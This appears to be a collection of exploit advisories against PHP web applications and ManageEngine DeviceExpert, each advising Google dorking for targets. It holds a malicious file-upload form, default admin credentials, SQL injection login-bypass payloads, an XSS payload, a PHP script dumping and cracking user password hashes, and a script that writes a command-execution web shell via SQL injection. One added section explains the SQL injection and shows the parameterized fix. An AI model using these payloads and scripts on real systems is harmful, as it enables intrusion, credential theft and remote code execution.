<pre><code>=============================================================================================================================================<br />| # Title : Online Job Recruitment Portal project v1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://www.kashipara.com/project/php/12866/online-job-recruitment-portal-php-project-source-code |<br />=============================================================================================================================================<br /><br />POC :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] The following HTML code uploads an executable malicious file remotely.<br /><br />[+] Go to line 10.<br /><br />[+] Set the target site link, save changes and apply.<br /><br />[+] Infected file : rec_detail.php.<br /><br />[+] Save the code as poc.html.<br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Recruitment Form</title><br /></head><br /><body><br /> <h1>Recruitment Form</h1><br /> <form action="http://127.0.0.1/Recruitment-Portal-master/rec_detail.php" method="POST" enctype="multipart/form-data"><br /> <!-- File input for photograph --><br /> <label for="photograph">Photograph:</label><br /> <input type="file" id="photograph" name="photograph" required><br><br><br /><br /> <!-- Text input for place of birth --><br /> <label for="placeofbirth">Place of Birth:</label><br /> <input type="text" id="placeofbirth" name="placeofbirth" required><br><br><br /><br /> <!-- Text input for father's/husband's name --><br /> <label for="fhname">Father's/Husband's Name:</label><br /> <input type="text" id="fhname" name="fhname" required><br><br><br /><br /> <!-- Select input for marital status --><br /> <label for="marital_status">Marital Status:</label><br /> <select id="marital_status" name="marital_status"><br /> <option value="single">Single</option><br /> <option value="married">Married</option><br /> <option value="divorced">Divorced</option><br /> </select><br><br><br /><br /> <!-- Select input for nationality --><br /> <label for="Nationality">Nationality:</label><br /> <select id="Nationality" name="Nationality"><br /> <option value="national1">Nationality 1</option><br /> <option value="national2">Nationality 2</option><br /> </select><br><br><br /><br /> <!-- Select input for handicapped --><br /> <label for="handicapped">Handicapped:</label><br /> <select id="handicapped" name="handicapped"><br /> <option value="yes">Yes</option><br /> <option value="no">No</option><br /> </select><br><br><br /><br /> <!-- Select input for religion --><br /> <label for="religion">Religion:</label><br /> <select id="religion" name="religion"><br /> <option value="religion1">Religion 1</option><br /> <option value="religion2">Religion 2</option><br /> </select><br><br><br /><br /> <!-- Select input for blood group --><br /> <label for="blood">Blood Group:</label><br /> <select id="blood" name="blood"><br /> <option value="A+">A+</option><br /> <option value="B+">B+</option><br /> <option value="AB+">AB+</option><br /> <option value="O+">O+</option><br /> <option value="O-">O-</option><br /> </select><br><br><br /><br /> <!-- Text input for mark --><br /> <label for="mark">Identification Mark:</label><br /> <input type="text" id="mark" name="mark" required><br><br><br /><br /> <!-- Submit button --><br /> <input type="submit" value="Submit"><br /> </form><br /></body><br /></html><br /><br /><br />[+] http://127.0.0.1/Recruitment-Portal-master/images/.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : IFSC Code Finder Portal v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://phpgurukul.com/ifsc-code-finder-project-using-php/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = Test@123<br /><br />[+] http://127.0.0.1/ifscfinder/admin/login.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : GYM Management System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/gym-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: admin@gmail.com<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/agms/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Emergency Ambulance Hiring Portal 1.0 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] use payload : User & Pass : ' or 0=0 ##<br /><br />[+] http://127.0.0.1/eahp/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : DeviceExpert v 5.9.7 build 5970 PHP extracts Credentials Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://manageengine.com/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] This PHP code extracts usernames and salted MD5 password hashes from ManageEngine DeviceExpert version 5.9 build 5980 and prior.<br /><br />[+] Line 87 : set your target.<br /> <br />[+] usage : C:\www\test>php 3.php<br /><br />[+] Payload :<br /><br /><?php<br />class ManageEngineDeviceExpert {<br /> private $host;<br /> private $port;<br /> private $ssl;<br /><br /> public function __construct($host, $port = 6060, $ssl = true) {<br /> $this->host = $host;<br /> $this->port = $port;<br /> $this->ssl = $ssl;<br /> }<br /><br /> private function sendRequest($path) {<br /> $url = ($this->ssl ? 'https://' : 'http://') . $this->host . ':' . $this->port . $path;<br /> $ch = curl_init($url);<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /> curl_setopt($ch, CURLOPT_TIMEOUT, 30);<br /> // The appliance ships with a self-signed certificate; without these two options<br /> // curl aborts the TLS handshake and curl_exec() returns false<br /> curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<br /> curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);<br /> $response = curl_exec($ch);<br /> curl_close($ch);<br /> return $response;<br /> }<br /><br /> public function getUsers() {<br /> echo "Reading users from master...\n";<br /> // The servlet answers without authentication with one <discoverydata> element per user<br /> $response = $this->sendRequest('/ReadUsersFromMasterServlet');<br /> if (!$response) {<br /> echo "Connection failed\n";<br /> return null;<br /> }<br /> if (strpos($response, '<discoverydata>') !== false) {<br /> // The s modifier lets a record span several lines<br /> preg_match_all('/<discoverydata>(.*?)<\/discoverydata>/s', $response, $matches);<br /> echo "Found " . count($matches[0]) . " users\n";<br /> return $matches[0];<br /> } else {<br /> echo "Could not find any users\n";<br /> return null;<br /> }<br /> }<br /><br /> public function parseUserData($user) {<br /> if (!$user) return null;<br /><br /> preg_match('/<username>([^<]+)<\/username>/', $user, $username);<br /> preg_match('/<password>([^<]+)<\/password>/', $user, $encoded_hash);<br /> preg_match('/<userrole>([^<]+)<\/userrole>/', $user, $role);<br /> preg_match('/<emailid>([^<]+)<\/emailid>/', $user, $email);<br /> preg_match('/<saltvalue>([^<]+)<\/saltvalue>/', $user, $salt);<br /> // Skip records that lack a username, hash or salt instead of emitting undefined-index notices<br /> if (empty($username[1]) || empty($encoded_hash[1]) || empty($salt[1])) return null;<br /><br /> // The password element holds the raw MD5 digest, base64 encoded<br /> $hash = base64_decode($encoded_hash[1]);<br /> $password = null;<br /><br /> // The stored value is md5(password . salt), so a handful of defaults is cheap to try offline<br /> $weak_passwords = ['12345', 'admin', 'password', $username[1]];<br /> foreach ($weak_passwords as $weak_password) {<br /> if (md5($weak_password . $salt[1]) === bin2hex($hash)) {<br /> $password = $weak_password;<br /> break;<br /> }<br /> }<br /><br /> return [<br /> 'username' => $username[1],<br /> 'password' => $password,<br /> 'hash' => bin2hex($hash),<br /> 'role' => $role[1] ?? '',<br /> 'email' => $email[1] ?? '',<br /> 'salt' => $salt[1]<br /> ];<br /> }<br /><br /> public function run() {<br /> $users = $this->getUsers();<br /> if (!$users) return;<br /><br /> foreach ($users as $user) {<br /> $user_data = $this->parseUserData($user);<br /> if (!$user_data) continue;<br /><br /> echo "User: " . $user_data['username'] . "\n";<br /> echo "Password: " . ($user_data['password'] ? $user_data['password'] : 'Not found') . "\n";<br /> echo "Hash: " . $user_data['hash'] . "\n";<br /> echo "Role: " . $user_data['role'] . "\n";<br /> echo "Email: " . $user_data['email'] . "\n";<br /> echo "Salt: " . $user_data['salt'] . "\n";<br /> echo "----------------------------\n";<br /> }<br /> }<br />}<br /><br />// Use the class: set the target host here<br />$deviceExpert = new ManageEngineDeviceExpert('127.0.0.1');<br />$deviceExpert->run();<br />?><br /><br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : COVID19 - Testing Management System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: admin<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/covid-tms/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : BP Monitoring Management System 1.0 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/bp-monitoring-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] use payload : User = 'or''='@gmail.com & Pass : ' or 0=0 ##<br /><br />[+] http://127.0.0.1/bpmms/edit-family-member.php?fmid=1<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Auto/Taxi Stand Management System 1.0 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/auto-taxi-stand-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] use payload : User = ' or 0=0 ## & Pass : ' or 0=0 ##<br /><br />[+] http://127.0.0.1/atsms/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
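<p>The three auth-bypass advisories above (Emergency Ambulance Hiring Portal, BP Monitoring Management System, Auto/Taxi Stand Management System) use the same trick: the login form's fields are concatenated into the SQL text, so <code>' or 0=0 ##</code> closes the string literal, adds an always-true condition and comments out the rest of the query. The following is an added example for this page, not code from the advisories or from PHPGurukul: it runs the vulnerable concatenation and a parameterized query against a constructed SQLite table so the difference can be observed offline. The table and column names and the plaintext stored password are assumptions for the demo (the page shows neither the schema nor the hashing); the payloads' trailing <code>##</code> is MySQL's <code>#</code> comment, which SQLite lacks, so they are written here with <code>-- </code>, and the BP Monitoring username variant <code>'or''='@gmail.com</code> is included as given.</p>

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the admin table (schema and plaintext
    password are demo assumptions, not taken from the real application)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tbladmin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO tbladmin (username, password) VALUES (?, ?)", ("admin", "Test@123")
    )
    conn.commit()
    return conn


def vulnerable_sql(user: str, pw: str) -> str:
    """The pattern the payloads rely on: form fields spliced into the query text."""
    return f"SELECT id, username FROM tbladmin WHERE username='{user}' AND password='{pw}'"


def vulnerable_login(conn: sqlite3.Connection, user: str, pw: str):
    """Returns a row for any input that makes the WHERE clause true."""
    return conn.execute(vulnerable_sql(user, pw)).fetchone()


def safe_login(conn: sqlite3.Connection, user: str, pw: str):
    """Parameterized form: the payload is compared as data, never parsed as SQL."""
    return conn.execute(
        "SELECT id, username FROM tbladmin WHERE username=? AND password=?", (user, pw)
    ).fetchone()


# The advisories end their payloads with '##' (MySQL '#' comment). SQLite has no
# '#' comment, so the same payloads are written with '-- ' for this demo.
BYPASS_BOTH = ("' or 0=0 -- ", "' or 0=0 -- ")          # Ambulance / Auto-Taxi Stand
BYPASS_EMAIL = ("'or''='@gmail.com", "' or 0=0 -- ")    # BP Monitoring (email-style username)


def demo() -> dict:
    """Run each payload, plus the real credentials, through both login paths."""
    conn = make_db()
    cases = {"both_fields": BYPASS_BOTH, "email_variant": BYPASS_EMAIL,
             "real_creds": ("admin", "Test@123")}
    return {
        label: (vulnerable_login(conn, u, p), safe_login(conn, u, p))
        for label, (u, p) in cases.items()
    }


if __name__ == "__main__":
    for label, (vuln, safe) in demo().items():
        print(f"{label:<14} concatenated -> {vuln}  parameterized -> {safe}")
    print("query as executed:", vulnerable_sql(*BYPASS_EMAIL))
```

Printing the assembled query shows why the email variant still logs in: <code>username=''or''='@gmail.com' AND password='' or 0=0</code> is false until the trailing <code>or 0=0</code>, and everything after <code>-- </code> (or <code>#</code> on MySQL) is discarded. The parameterized path returns a row only for the genuine credentials, which is the fix for all three portals.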
<pre><code>=============================================================================================================================================<br />| # Title : Webpay E-Commerce v1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] use payload : /index.php?product=r-series'%22()%26%25<acx><ScRiPt%20>prompt(936967)</ScRiPt><br /><br />[+] https://www/127.0.0.1/demo/gajrajgraphics.com.np/home/index.php?product=r-series'%22()%26%25<acx><ScRiPt%20>prompt(936967)</ScRiPt><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Men Salon Management System 2.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/men-salon-management-system-using-php-and-mysql/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] This payload injects PHP code containing a backdoor.<br /><br />[+] Lines 16 and 19 : set your target.<br /><br />[+] save payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php 1.php<br /><br />[+] payload :<br /><br /><?php<br />// Helper: POST a form-encoded body to $url and return the response body<br />function send_request($url, $data) {<br /> $options = [<br /> 'http' => [<br /> 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",<br /> 'method' => 'POST',<br /> 'content' => http_build_query($data),<br /> ]<br /> ];<br /> $context = stream_context_create($options);<br /> return file_get_contents($url, false, $context);<br />}<br /><br />// Target base URL<br />$url = 'http://localhost/msms/';<br /><br />// Absolute path on the target where the injected file is written (must be writable by MySQL and served by the web server)<br />$path = 'C:\www\msms\uploaded.php';<br />$path = str_replace("\\", "\\\\", $path);<br /><br />// Backdoor payload<br />$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';<br /><br />// Send a PHP file containing the backdoor: the username field is spliced into the login query,<br />// so a UNION SELECT ... INTO OUTFILE writes the payload to disk<br />$payload = [<br /> 'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",<br /> 'password' => 'test',<br /> 'login' => ''<br />];<br />send_request($url . "admin/index.php", $payload);<br /><br />echo "[+] PHP backdoor uploaded successfully at $path\n";<br /><br />// Request the written PHP file and test the backdoor<br />$response = file_get_contents($url . "uploaded.php?cmd=whoami");<br />echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";<br />?><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>